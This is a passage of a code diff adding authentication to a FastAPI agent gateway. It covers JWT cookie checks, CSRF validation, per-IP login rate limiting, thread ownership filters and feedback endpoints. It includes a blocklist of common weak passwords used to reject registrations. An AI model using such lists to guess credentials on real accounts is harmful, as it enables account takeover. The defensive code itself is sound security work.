app.state.run_manager = RunManager(store=app.state.run_store)
|
||||
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
await close_engine()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Getters – called by routers per-request
|
||||
# Getters -- called by routers per-request
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def get_stream_bridge(request: Request) -> StreamBridge:
|
||||
"""Return the global :class:`StreamBridge`, or 503."""
|
||||
bridge = getattr(request.app.state, "stream_bridge", None)
|
||||
if bridge is None:
|
||||
raise HTTPException(status_code=503, detail="Stream bridge not available")
|
||||
return bridge
|
||||
def _require(attr: str, label: str):
|
||||
"""Create a FastAPI dependency that returns ``app.state.<attr>`` or 503."""
|
||||
|
||||
def dep(request: Request):
|
||||
val = getattr(request.app.state, attr, None)
|
||||
if val is None:
|
||||
raise HTTPException(status_code=503, detail=f"{label} not available")
|
||||
return val
|
||||
|
||||
dep.__name__ = dep.__qualname__ = f"get_{attr}"
|
||||
return dep
|
||||
|
||||
|
||||
def get_run_manager(request: Request) -> RunManager:
|
||||
"""Return the global :class:`RunManager`, or 503."""
|
||||
mgr = getattr(request.app.state, "run_manager", None)
|
||||
if mgr is None:
|
||||
raise HTTPException(status_code=503, detail="Run manager not available")
|
||||
return mgr
|
||||
|
||||
|
||||
def get_checkpointer(request: Request):
|
||||
"""Return the global checkpointer, or 503."""
|
||||
cp = getattr(request.app.state, "checkpointer", None)
|
||||
if cp is None:
|
||||
raise HTTPException(status_code=503, detail="Checkpointer not available")
|
||||
return cp
|
||||
get_stream_bridge = _require("stream_bridge", "Stream bridge")
|
||||
get_run_manager = _require("run_manager", "Run manager")
|
||||
get_checkpointer = _require("checkpointer", "Checkpointer")
|
||||
get_run_event_store = _require("run_event_store", "Run event store")
|
||||
get_feedback_repo = _require("feedback_repo", "Feedback")
|
||||
get_run_store = _require("run_store", "Run store")
|
||||
|
||||
|
||||
def get_store(request: Request):
|
||||
"""Return the global store (may be ``None`` if not configured)."""
|
||||
return getattr(request.app.state, "store", None)
|
||||
|
||||
|
||||
get_thread_meta_repo = _require("thread_meta_repo", "Thread metadata store")
|
||||
|
||||
|
||||
def get_run_context(request: Request) -> RunContext:
|
||||
"""Build a :class:`RunContext` from ``app.state`` singletons.
|
||||
|
||||
Returns a *base* context with infrastructure dependencies. Callers that
|
||||
need per-run fields (e.g. ``follow_up_to_run_id``) should use
|
||||
``dataclasses.replace(ctx, follow_up_to_run_id=...)`` before passing it
|
||||
to :func:`run_agent`.
|
||||
"""
|
||||
from deerflow.config import get_app_config
|
||||
|
||||
return RunContext(
|
||||
checkpointer=get_checkpointer(request),
|
||||
store=get_store(request),
|
||||
event_store=get_run_event_store(request),
|
||||
run_events_config=getattr(get_app_config(), "run_events", None),
|
||||
thread_meta_repo=get_thread_meta_repo(request),
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Auth helpers (used by authz.py and auth middleware)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
# Cached singletons to avoid repeated instantiation per request
|
||||
_cached_local_provider: LocalAuthProvider | None = None
|
||||
_cached_repo: SQLiteUserRepository | None = None
|
||||
|
||||
|
||||
def get_local_provider() -> LocalAuthProvider:
|
||||
"""Get or create the cached LocalAuthProvider singleton.
|
||||
|
||||
Must be called after ``init_engine_from_config()`` — the shared
|
||||
session factory is required to construct the user repository.
|
||||
"""
|
||||
global _cached_local_provider, _cached_repo
|
||||
if _cached_repo is None:
|
||||
from app.gateway.auth.repositories.sqlite import SQLiteUserRepository
|
||||
from deerflow.persistence.engine import get_session_factory
|
||||
|
||||
sf = get_session_factory()
|
||||
if sf is None:
|
||||
raise RuntimeError("get_local_provider() called before init_engine_from_config(); cannot access users table")
|
||||
_cached_repo = SQLiteUserRepository(sf)
|
||||
if _cached_local_provider is None:
|
||||
from app.gateway.auth.local_provider import LocalAuthProvider
|
||||
|
||||
_cached_local_provider = LocalAuthProvider(repository=_cached_repo)
|
||||
return _cached_local_provider
|
||||
|
||||
|
||||
async def get_current_user_from_request(request: Request):
|
||||
"""Get the current authenticated user from the request cookie.
|
||||
|
||||
Raises HTTPException 401 if not authenticated.
|
||||
"""
|
||||
from app.gateway.auth import decode_token
|
||||
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse, TokenError, token_error_to_code
|
||||
|
||||
access_token = request.cookies.get("access_token")
|
||||
if not access_token:
|
||||
raise HTTPException(
|
||||
status_code=401,
|
||||
detail=AuthErrorResponse(code=AuthErrorCode.NOT_AUTHENTICATED, message="Not authenticated").model_dump(),
|
||||
)
|
||||
|
||||
payload = decode_token(access_token)
|
||||
if isinstance(payload, TokenError):
|
||||
raise HTTPException(
|
||||
status_code=401,
|
||||
detail=AuthErrorResponse(code=token_error_to_code(payload), message=f"Token error: {payload.value}").model_dump(),
|
||||
)
|
||||
|
||||
provider = get_local_provider()
|
||||
user = await provider.get_user(payload.sub)
|
||||
if user is None:
|
||||
raise HTTPException(
|
||||
status_code=401,
|
||||
detail=AuthErrorResponse(code=AuthErrorCode.USER_NOT_FOUND, message="User not found").model_dump(),
|
||||
)
|
||||
|
||||
# Token version mismatch → password was changed, token is stale
|
||||
if user.token_version != payload.ver:
|
||||
raise HTTPException(
|
||||
status_code=401,
|
||||
detail=AuthErrorResponse(code=AuthErrorCode.TOKEN_INVALID, message="Token revoked (password changed)").model_dump(),
|
||||
)
|
||||
|
||||
return user
|
||||
|
||||
|
||||
async def get_optional_user_from_request(request: Request):
|
||||
"""Get optional authenticated user from request.
|
||||
|
||||
Returns None if not authenticated.
|
||||
"""
|
||||
try:
|
||||
return await get_current_user_from_request(request)
|
||||
except HTTPException:
|
||||
return None
|
||||
|
||||
|
||||
async def get_current_user(request: Request) -> str | None:
|
||||
"""Extract user_id from request cookie, or None if not authenticated.
|
||||
|
||||
Thin adapter that returns the string id for callers that only need
|
||||
identification (e.g., ``feedback.py``). Full-user callers should use
|
||||
``get_current_user_from_request`` or ``get_optional_user_from_request``.
|
||||
"""
|
||||
user = await get_optional_user_from_request(request)
|
||||
return str(user.id) if user else None
|
||||
|
||||
@@ -0,0 +1,106 @@
|
||||
"""LangGraph Server auth handler — shares JWT logic with Gateway.
|
||||
|
||||
Loaded by LangGraph Server via langgraph.json ``auth.path``.
|
||||
Reuses the same ``decode_token`` / ``get_auth_config`` as Gateway,
|
||||
so both modes validate tokens with the same secret and rules.
|
||||
|
||||
Two layers:
|
||||
1. @auth.authenticate — validates JWT cookie, extracts user_id,
|
||||
and enforces CSRF on state-changing methods (POST/PUT/DELETE/PATCH)
|
||||
2. @auth.on — returns metadata filter so each user only sees own threads
|
||||
"""
|
||||
|
||||
import secrets
|
||||
|
||||
from langgraph_sdk import Auth
|
||||
|
||||
from app.gateway.auth.errors import TokenError
|
||||
from app.gateway.auth.jwt import decode_token
|
||||
from app.gateway.deps import get_local_provider
|
||||
|
||||
auth = Auth()
|
||||
|
||||
# Methods that require CSRF validation (state-changing per RFC 7231).
|
||||
_CSRF_METHODS = frozenset({"POST", "PUT", "DELETE", "PATCH"})
|
||||
|
||||
|
||||
def _check_csrf(request) -> None:
|
||||
"""Enforce Double Submit Cookie CSRF check for state-changing requests.
|
||||
|
||||
Mirrors Gateway's CSRFMiddleware logic so that LangGraph routes
|
||||
proxied directly by nginx have the same CSRF protection.
|
||||
"""
|
||||
method = getattr(request, "method", "") or ""
|
||||
if method.upper() not in _CSRF_METHODS:
|
||||
return
|
||||
|
||||
cookie_token = request.cookies.get("csrf_token")
|
||||
header_token = request.headers.get("x-csrf-token")
|
||||
|
||||
if not cookie_token or not header_token:
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=403,
|
||||
detail="CSRF token missing. Include X-CSRF-Token header.",
|
||||
)
|
||||
|
||||
if not secrets.compare_digest(cookie_token, header_token):
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=403,
|
||||
detail="CSRF token mismatch.",
|
||||
)
|
||||
|
||||
|
||||
@auth.authenticate
|
||||
async def authenticate(request):
|
||||
"""Validate the session cookie, decode JWT, and check token_version.
|
||||
|
||||
Same validation chain as Gateway's get_current_user_from_request:
|
||||
cookie → decode JWT → DB lookup → token_version match
|
||||
Also enforces CSRF on state-changing methods.
|
||||
"""
|
||||
# CSRF check before authentication so forged cross-site requests
|
||||
# are rejected early, even if the cookie carries a valid JWT.
|
||||
_check_csrf(request)
|
||||
|
||||
token = request.cookies.get("access_token")
|
||||
if not token:
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=401,
|
||||
detail="Not authenticated",
|
||||
)
|
||||
|
||||
payload = decode_token(token)
|
||||
if isinstance(payload, TokenError):
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=401,
|
||||
detail=f"Token error: {payload.value}",
|
||||
)
|
||||
|
||||
user = await get_local_provider().get_user(payload.sub)
|
||||
if user is None:
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=401,
|
||||
detail="User not found",
|
||||
)
|
||||
if user.token_version != payload.ver:
|
||||
raise Auth.exceptions.HTTPException(
|
||||
status_code=401,
|
||||
detail="Token revoked (password changed)",
|
||||
)
|
||||
|
||||
return payload.sub
|
||||
|
||||
|
||||
@auth.on
|
||||
async def add_owner_filter(ctx: Auth.types.AuthContext, value: dict):
|
||||
"""Inject owner_id metadata on writes; filter by owner_id on reads.
|
||||
|
||||
Gateway stores thread ownership as ``metadata.owner_id``.
|
||||
This handler ensures LangGraph Server enforces the same isolation.
|
||||
"""
|
||||
# On create/update: stamp owner_id into metadata
|
||||
metadata = value.setdefault("metadata", {})
|
||||
metadata["owner_id"] = ctx.user.identity
|
||||
|
||||
# Return filter dict — LangGraph applies it to search/read/delete
|
||||
return {"owner_id": ctx.user.identity}
|
||||
@@ -7,6 +7,7 @@ from urllib.parse import quote
|
||||
from fastapi import APIRouter, HTTPException, Request
|
||||
from fastapi.responses import FileResponse, PlainTextResponse, Response
|
||||
|
||||
from app.gateway.authz import require_permission
|
||||
from app.gateway.path_utils import resolve_thread_virtual_path
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -81,6 +82,7 @@ def _extract_file_from_skill_archive(zip_path: Path, internal_path: str) -> byte
|
||||
summary="Get Artifact File",
|
||||
description="Retrieve an artifact file generated by the AI agent. Text and binary files can be viewed inline, while active web content is always downloaded.",
|
||||
)
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def get_artifact(thread_id: str, path: str, request: Request, download: bool = False) -> Response:
|
||||
"""Get an artifact file by its path.
|
||||
|
||||
|
||||
@@ -0,0 +1,418 @@
|
||||
"""Authentication endpoints."""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import time
|
||||
from ipaddress import ip_address, ip_network
|
||||
|
||||
from fastapi import APIRouter, Depends, HTTPException, Request, Response, status
|
||||
from fastapi.security import OAuth2PasswordRequestForm
|
||||
from pydantic import BaseModel, EmailStr, Field, field_validator
|
||||
|
||||
from app.gateway.auth import (
|
||||
UserResponse,
|
||||
create_access_token,
|
||||
)
|
||||
from app.gateway.auth.config import get_auth_config
|
||||
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse
|
||||
from app.gateway.csrf_middleware import is_secure_request
|
||||
from app.gateway.deps import get_current_user_from_request, get_local_provider
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/api/v1/auth", tags=["auth"])
|
||||
|
||||
|
||||
# ── Request/Response Models ──────────────────────────────────────────────
|
||||
|
||||
|
||||
class LoginResponse(BaseModel):
|
||||
"""Response model for login — token only lives in HttpOnly cookie."""
|
||||
|
||||
expires_in: int # seconds
|
||||
needs_setup: bool = False
|
||||
|
||||
|
||||
# Top common-password blocklist. Drawn from the public SecLists "10k worst
|
||||
# passwords" set, lowercased + length>=8 only (shorter ones already fail
|
||||
# the min_length check). Kept tight on purpose: this is the **lower bound**
|
||||
# defense, not a full HIBP / passlib check, and runs in-process per request.
|
||||
_COMMON_PASSWORDS: frozenset[str] = frozenset(
|
||||
{
|
||||
"password",
|
||||
"password1",
|
||||
"password12",
|
||||
"password123",
|
||||
"password1234",
|
||||
"12345678",
|
||||
"123456789",
|
||||
"1234567890",
|
||||
"qwerty12",
|
||||
"qwertyui",
|
||||
"qwerty123",
|
||||
"abc12345",
|
||||
"abcd1234",
|
||||
"iloveyou",
|
||||
"letmein1",
|
||||
"welcome1",
|
||||
"welcome123",
|
||||
"admin123",
|
||||
"administrator",
|
||||
"passw0rd",
|
||||
"p@ssw0rd",
|
||||
"monkey12",
|
||||
"trustno1",
|
||||
"sunshine",
|
||||
"princess",
|
||||
"football",
|
||||
"baseball",
|
||||
"superman",
|
||||
"batman123",
|
||||
"starwars",
|
||||
"dragon123",
|
||||
"master123",
|
||||
"shadow12",
|
||||
"michael1",
|
||||
"jennifer",
|
||||
"computer",
|
||||
}
|
||||
)
|
||||
|
||||
|
||||
def _password_is_common(password: str) -> bool:
|
||||
"""Case-insensitive blocklist check.
|
||||
|
||||
Lowercases the input so trivial mutations like ``Password`` /
|
||||
``PASSWORD`` are also rejected. Does not normalize digit substitutions
|
||||
(``p@ssw0rd`` is included as a literal entry instead) — keeping the
|
||||
rule cheap and predictable.
|
||||
"""
|
||||
return password.lower() in _COMMON_PASSWORDS
|
||||
|
||||
|
||||
def _validate_strong_password(value: str) -> str:
|
||||
"""Pydantic field-validator body shared by Register + ChangePassword.
|
||||
|
||||
Constraint = function, not type-level mixin. The two request models
|
||||
have no "is-a" relationship; they only share the password-strength
|
||||
rule. Lifting it into a free function lets each model bind it via
|
||||
``@field_validator(field_name)`` without inheritance gymnastics.
|
||||
"""
|
||||
if _password_is_common(value):
|
||||
raise ValueError("Password is too common; choose a stronger password.")
|
||||
return value
|
||||
|
||||
|
||||
class RegisterRequest(BaseModel):
|
||||
"""Request model for user registration."""
|
||||
|
||||
email: EmailStr
|
||||
password: str = Field(..., min_length=8)
|
||||
|
||||
_strong_password = field_validator("password")(classmethod(lambda cls, v: _validate_strong_password(v)))
|
||||
|
||||
|
||||
class ChangePasswordRequest(BaseModel):
|
||||
"""Request model for password change (also handles setup flow)."""
|
||||
|
||||
current_password: str
|
||||
new_password: str = Field(..., min_length=8)
|
||||
new_email: EmailStr | None = None
|
||||
|
||||
_strong_password = field_validator("new_password")(classmethod(lambda cls, v: _validate_strong_password(v)))
|
||||
|
||||
|
||||
class MessageResponse(BaseModel):
|
||||
"""Generic message response."""
|
||||
|
||||
message: str
|
||||
|
||||
|
||||
# ── Helpers ───────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
def _set_session_cookie(response: Response, token: str, request: Request) -> None:
|
||||
"""Set the access_token HttpOnly cookie on the response."""
|
||||
config = get_auth_config()
|
||||
is_https = is_secure_request(request)
|
||||
response.set_cookie(
|
||||
key="access_token",
|
||||
value=token,
|
||||
httponly=True,
|
||||
secure=is_https,
|
||||
samesite="lax",
|
||||
max_age=config.token_expiry_days * 24 * 3600 if is_https else None,
|
||||
)
|
||||
|
||||
|
||||
# ── Rate Limiting ────────────────────────────────────────────────────────
|
||||
# In-process dict — not shared across workers. Sufficient for single-worker deployments.
|
||||
|
||||
_MAX_LOGIN_ATTEMPTS = 5
|
||||
_LOCKOUT_SECONDS = 300 # 5 minutes
|
||||
|
||||
# ip → (fail_count, lock_until_timestamp)
|
||||
_login_attempts: dict[str, tuple[int, float]] = {}
|
||||
|
||||
|
||||
def _trusted_proxies() -> list:
|
||||
"""Parse ``AUTH_TRUSTED_PROXIES`` env var into a list of ip_network objects.
|
||||
|
||||
Comma-separated CIDR or single-IP entries. Empty / unset = no proxy is
|
||||
trusted (direct mode). Invalid entries are skipped with a logger warning.
|
||||
Read live so env-var overrides take effect immediately and tests can
|
||||
``monkeypatch.setenv`` without poking a module-level cache.
|
||||
"""
|
||||
raw = os.getenv("AUTH_TRUSTED_PROXIES", "").strip()
|
||||
if not raw:
|
||||
return []
|
||||
nets = []
|
||||
for entry in raw.split(","):
|
||||
entry = entry.strip()
|
||||
if not entry:
|
||||
continue
|
||||
try:
|
||||
nets.append(ip_network(entry, strict=False))
|
||||
except ValueError:
|
||||
logger.warning("AUTH_TRUSTED_PROXIES: ignoring invalid entry %r", entry)
|
||||
return nets
|
||||
|
||||
|
||||
def _get_client_ip(request: Request) -> str:
|
||||
"""Extract the real client IP for rate limiting.
|
||||
|
||||
Trust model:
|
||||
|
||||
- The TCP peer (``request.client.host``) is always the baseline. It is
|
||||
whatever the kernel reports as the connecting socket — unforgeable
|
||||
by the client itself.
|
||||
- ``X-Real-IP`` is **only** honored if the TCP peer is in the
|
||||
``AUTH_TRUSTED_PROXIES`` allowlist (set via env var, comma-separated
|
||||
CIDR or single IPs). When set, the gateway is assumed to be behind a
|
||||
reverse proxy (nginx, Cloudflare, ALB, …) that overwrites
|
||||
``X-Real-IP`` with the original client address.
|
||||
- With no ``AUTH_TRUSTED_PROXIES`` set, ``X-Real-IP`` is silently
|
||||
ignored — closing the bypass where any client could rotate the
|
||||
header to dodge per-IP rate limits in dev / direct-gateway mode.
|
||||
|
||||
``X-Forwarded-For`` is intentionally NOT used because it is naturally
|
||||
client-controlled at the *first* hop and the trust chain is harder to
|
||||
audit per-request.
|
||||
"""
|
||||
peer_host = request.client.host if request.client else None
|
||||
|
||||
trusted = _trusted_proxies()
|
||||
if trusted and peer_host:
|
||||
try:
|
||||
peer_ip = ip_address(peer_host)
|
||||
if any(peer_ip in net for net in trusted):
|
||||
real_ip = request.headers.get("x-real-ip", "").strip()
|
||||
if real_ip:
|
||||
return real_ip
|
||||
except ValueError:
|
||||
# peer_host wasn't a parseable IP (e.g. "unknown") — fall through
|
||||
pass
|
||||
|
||||
return peer_host or "unknown"
|
||||
|
||||
|
||||
def _check_rate_limit(ip: str) -> None:
|
||||
"""Raise 429 if the IP is currently locked out."""
|
||||
record = _login_attempts.get(ip)
|
||||
if record is None:
|
||||
return
|
||||
fail_count, lock_until = record
|
||||
if fail_count >= _MAX_LOGIN_ATTEMPTS:
|
||||
if time.time() < lock_until:
|
||||
raise HTTPException(
|
||||
status_code=429,
|
||||
detail="Too many login attempts. Try again later.",
|
||||
)
|
||||
del _login_attempts[ip]
|
||||
|
||||
|
||||
_MAX_TRACKED_IPS = 10000
|
||||
|
||||
|
||||
def _record_login_failure(ip: str) -> None:
|
||||
"""Record a failed login attempt for the given IP."""
|
||||
# Evict expired lockouts when dict grows too large
|
||||
if len(_login_attempts) >= _MAX_TRACKED_IPS:
|
||||
now = time.time()
|
||||
expired = [k for k, (c, t) in _login_attempts.items() if c >= _MAX_LOGIN_ATTEMPTS and now >= t]
|
||||
for k in expired:
|
||||
del _login_attempts[k]
|
||||
# If still too large, evict cheapest-to-lose half: below-threshold
|
||||
# IPs (lock_until=0.0) sort first, then earliest-expiring lockouts.
|
||||
if len(_login_attempts) >= _MAX_TRACKED_IPS:
|
||||
by_time = sorted(_login_attempts.items(), key=lambda kv: kv[1][1])
|
||||
for k, _ in by_time[: len(by_time) // 2]:
|
||||
del _login_attempts[k]
|
||||
|
||||
record = _login_attempts.get(ip)
|
||||
if record is None:
|
||||
_login_attempts[ip] = (1, 0.0)
|
||||
else:
|
||||
new_count = record[0] + 1
|
||||
lock_until = time.time() + _LOCKOUT_SECONDS if new_count >= _MAX_LOGIN_ATTEMPTS else 0.0
|
||||
_login_attempts[ip] = (new_count, lock_until)
|
||||
|
||||
|
||||
def _record_login_success(ip: str) -> None:
|
||||
"""Clear failure counter for the given IP on successful login."""
|
||||
_login_attempts.pop(ip, None)
|
||||
|
||||
|
||||
# ── Endpoints ─────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
@router.post("/login/local", response_model=LoginResponse)
|
||||
async def login_local(
|
||||
request: Request,
|
||||
response: Response,
|
||||
form_data: OAuth2PasswordRequestForm = Depends(),
|
||||
):
|
||||
"""Local email/password login."""
|
||||
client_ip = _get_client_ip(request)
|
||||
_check_rate_limit(client_ip)
|
||||
|
||||
user = await get_local_provider().authenticate({"email": form_data.username, "password": form_data.password})
|
||||
|
||||
if user is None:
|
||||
_record_login_failure(client_ip)
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_401_UNAUTHORIZED,
|
||||
detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="Incorrect email or password").model_dump(),
|
||||
)
|
||||
|
||||
_record_login_success(client_ip)
|
||||
token = create_access_token(str(user.id), token_version=user.token_version)
|
||||
_set_session_cookie(response, token, request)
|
||||
|
||||
return LoginResponse(
|
||||
expires_in=get_auth_config().token_expiry_days * 24 * 3600,
|
||||
needs_setup=user.needs_setup,
|
||||
)
|
||||
|
||||
|
||||
@router.post("/register", response_model=UserResponse, status_code=status.HTTP_201_CREATED)
|
||||
async def register(request: Request, response: Response, body: RegisterRequest):
|
||||
"""Register a new user account (always 'user' role).
|
||||
|
||||
Admin is auto-created on first boot. This endpoint creates regular users.
|
||||
Auto-login by setting the session cookie.
|
||||
"""
|
||||
try:
|
||||
user = await get_local_provider().create_user(email=body.email, password=body.password, system_role="user")
|
||||
except ValueError:
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_400_BAD_REQUEST,
|
||||
detail=AuthErrorResponse(code=AuthErrorCode.EMAIL_ALREADY_EXISTS, message="Email already registered").model_dump(),
|
||||
)
|
||||
|
||||
token = create_access_token(str(user.id), token_version=user.token_version)
|
||||
_set_session_cookie(response, token, request)
|
||||
|
||||
return UserResponse(id=str(user.id), email=user.email, system_role=user.system_role)
|
||||
|
||||
|
||||
@router.post("/logout", response_model=MessageResponse)
|
||||
async def logout(request: Request, response: Response):
|
||||
"""Logout current user by clearing the cookie."""
|
||||
response.delete_cookie(key="access_token", secure=is_secure_request(request), samesite="lax")
|
||||
return MessageResponse(message="Successfully logged out")
|
||||
|
||||
|
||||
@router.post("/change-password", response_model=MessageResponse)
|
||||
async def change_password(request: Request, response: Response, body: ChangePasswordRequest):
|
||||
"""Change password for the currently authenticated user.
|
||||
|
||||
Also handles the first-boot setup flow:
|
||||
- If new_email is provided, updates email (checks uniqueness)
|
||||
- If user.needs_setup is True and new_email is given, clears needs_setup
|
||||
- Always increments token_version to invalidate old sessions
|
||||
- Re-issues session cookie with new token_version
|
||||
"""
|
||||
from app.gateway.auth.password import hash_password_async, verify_password_async
|
||||
|
||||
user = await get_current_user_from_request(request)
|
||||
|
||||
if user.password_hash is None:
|
||||
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="OAuth users cannot change password").model_dump())
|
||||
|
||||
if not await verify_password_async(body.current_password, user.password_hash):
|
||||
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="Current password is incorrect").model_dump())
|
||||
|
||||
provider = get_local_provider()
|
||||
|
||||
# Update email if provided
|
||||
if body.new_email is not None:
|
||||
existing = await provider.get_user_by_email(body.new_email)
|
||||
if existing and str(existing.id) != str(user.id):
|
||||
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.EMAIL_ALREADY_EXISTS, message="Email already in use").model_dump())
|
||||
user.email = body.new_email
|
||||
|
||||
# Update password + bump version
|
||||
user.password_hash = await hash_password_async(body.new_password)
|
||||
user.token_version += 1
|
||||
|
||||
# Clear setup flag if this is the setup flow
|
||||
if user.needs_setup and body.new_email is not None:
|
||||
user.needs_setup = False
|
||||
|
||||
await provider.update_user(user)
|
||||
|
||||
# Re-issue cookie with new token_version
|
||||
token = create_access_token(str(user.id), token_version=user.token_version)
|
||||
_set_session_cookie(response, token, request)
|
||||
|
||||
return MessageResponse(message="Password changed successfully")
|
||||
|
||||
|
||||
@router.get("/me", response_model=UserResponse)
|
||||
async def get_me(request: Request):
|
||||
"""Get current authenticated user info."""
|
||||
user = await get_current_user_from_request(request)
|
||||
return UserResponse(id=str(user.id), email=user.email, system_role=user.system_role, needs_setup=user.needs_setup)
|
||||
|
||||
|
||||
@router.get("/setup-status")
|
||||
async def setup_status():
|
||||
"""Check if admin account exists. Always False after first boot."""
|
||||
user_count = await get_local_provider().count_users()
|
||||
return {"needs_setup": user_count == 0}
|
||||
|
||||
|
||||
# ── OAuth Endpoints (Future/Placeholder) ─────────────────────────────────
|
||||
|
||||
|
||||
@router.get("/oauth/{provider}")
|
||||
async def oauth_login(provider: str):
|
||||
"""Initiate OAuth login flow.
|
||||
|
||||
Redirects to the OAuth provider's authorization URL.
|
||||
Currently a placeholder - requires OAuth provider implementation.
|
||||
"""
|
||||
if provider not in ["github", "google"]:
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_400_BAD_REQUEST,
|
||||
detail=f"Unsupported OAuth provider: {provider}",
|
||||
)
|
||||
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_501_NOT_IMPLEMENTED,
|
||||
detail="OAuth login not yet implemented",
|
||||
)
|
||||
|
||||
|
||||
@router.get("/callback/{provider}")
|
||||
async def oauth_callback(provider: str, code: str, state: str):
|
||||
"""OAuth callback endpoint.
|
||||
|
||||
Handles the OAuth provider's callback after user authorization.
|
||||
Currently a placeholder.
|
||||
"""
|
||||
raise HTTPException(
|
||||
status_code=status.HTTP_501_NOT_IMPLEMENTED,
|
||||
detail="OAuth callback not yet implemented",
|
||||
)
|
||||
@@ -0,0 +1,132 @@
|
||||
"""Feedback endpoints — create, list, stats, delete.
|
||||
|
||||
Allows users to submit thumbs-up/down feedback on runs,
|
||||
optionally scoped to a specific message.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from typing import Any
|
||||
|
||||
from fastapi import APIRouter, HTTPException, Request
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from app.gateway.authz import require_permission
|
||||
from app.gateway.deps import get_current_user, get_feedback_repo, get_run_store
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
router = APIRouter(prefix="/api/threads", tags=["feedback"])
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Request / response models
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class FeedbackCreateRequest(BaseModel):
|
||||
rating: int = Field(..., description="Feedback rating: +1 (positive) or -1 (negative)")
|
||||
comment: str | None = Field(default=None, description="Optional text feedback")
|
||||
message_id: str | None = Field(default=None, description="Optional: scope feedback to a specific message")
|
||||
|
||||
|
||||
class FeedbackResponse(BaseModel):
|
||||
feedback_id: str
|
||||
run_id: str
|
||||
thread_id: str
|
||||
owner_id: str | None = None
|
||||
message_id: str | None = None
|
||||
rating: int
|
||||
comment: str | None = None
|
||||
created_at: str = ""
|
||||
|
||||
|
||||
class FeedbackStatsResponse(BaseModel):
|
||||
run_id: str
|
||||
total: int = 0
|
||||
positive: int = 0
|
||||
negative: int = 0
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Endpoints
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@router.post("/{thread_id}/runs/{run_id}/feedback", response_model=FeedbackResponse)
|
||||
@require_permission("threads", "write", owner_check=True, require_existing=True)
|
||||
async def create_feedback(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
body: FeedbackCreateRequest,
|
||||
request: Request,
|
||||
) -> dict[str, Any]:
|
||||
"""Submit feedback (thumbs-up/down) for a run."""
|
||||
if body.rating not in (1, -1):
|
||||
raise HTTPException(status_code=400, detail="rating must be +1 or -1")
|
||||
|
||||
user_id = await get_current_user(request)
|
||||
|
||||
# Validate run exists and belongs to thread
|
||||
run_store = get_run_store(request)
|
||||
run = await run_store.get(run_id)
|
||||
if run is None:
|
||||
raise HTTPException(status_code=404, detail=f"Run {run_id} not found")
|
||||
if run.get("thread_id") != thread_id:
|
||||
raise HTTPException(status_code=404, detail=f"Run {run_id} not found in thread {thread_id}")
|
||||
|
||||
feedback_repo = get_feedback_repo(request)
|
||||
return await feedback_repo.create(
|
||||
run_id=run_id,
|
||||
thread_id=thread_id,
|
||||
rating=body.rating,
|
||||
owner_id=user_id,
|
||||
message_id=body.message_id,
|
||||
comment=body.comment,
|
||||
)
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}/feedback", response_model=list[FeedbackResponse])
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def list_feedback(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
request: Request,
|
||||
) -> list[dict[str, Any]]:
|
||||
"""List all feedback for a run."""
|
||||
feedback_repo = get_feedback_repo(request)
|
||||
return await feedback_repo.list_by_run(thread_id, run_id)
|
||||
|
||||
|
||||
@router.get("/{thread_id}/runs/{run_id}/feedback/stats", response_model=FeedbackStatsResponse)
|
||||
@require_permission("threads", "read", owner_check=True)
|
||||
async def feedback_stats(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
request: Request,
|
||||
) -> dict[str, Any]:
|
||||
"""Get aggregated feedback stats (positive/negative counts) for a run."""
|
||||
feedback_repo = get_feedback_repo(request)
|
||||
return await feedback_repo.aggregate_by_run(thread_id, run_id)
|
||||
|
||||
|
||||
@router.delete("/{thread_id}/runs/{run_id}/feedback/{feedback_id}")
|
||||
@require_permission("threads", "delete", owner_check=True, require_existing=True)
|
||||
async def delete_feedback(
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
feedback_id: str,
|
||||
request: Request,
|
||||
) -> dict[str, bool]:
|
||||
"""Delete a feedback record."""
|
||||
feedback_repo = get_feedback_repo(request)
|
||||
# Verify feedback belongs to the specified thread/run before deleting
|
||||
existing = await feedback_repo.get(feedback_id)
|
||||
if existing is None:
|
||||
raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found")
|
